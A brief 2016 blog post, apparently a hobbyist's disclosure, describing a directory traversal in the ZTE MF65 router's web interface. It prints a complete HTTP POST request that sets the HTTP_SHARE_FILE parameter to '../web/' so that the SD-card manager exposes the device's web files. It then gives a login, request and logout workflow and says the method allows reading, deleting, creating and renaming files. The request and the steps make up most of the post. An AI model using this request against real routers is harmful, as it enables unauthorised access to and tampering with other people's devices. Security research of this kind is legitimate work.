Monday 13 June 2016

/////ZTE MF65 -- local file listing method 2(LFLM )/////

another super quick one for a better listing in the web application


POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.168.0.1

isTest=false&goformId=HTTPSHARE_AUTH_SET
&HTTP_SHARE_STATUS=Enabled
&HTTP_SHARE_WR_AUTH=readWrite
&HTTP_SHARE_FILE=..%2Fweb%2F


using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager,
you will need to be logged in for this method.

so your work flow is:
  1. login
  2. send request to change path 
  3. logout
use the httpguest button to see the files


this can be used to include files, delete, create and rename files/folders.
this is method requires login but other methods can work without a login.

till next time :)
FrankSxx

No comments:

Post a Comment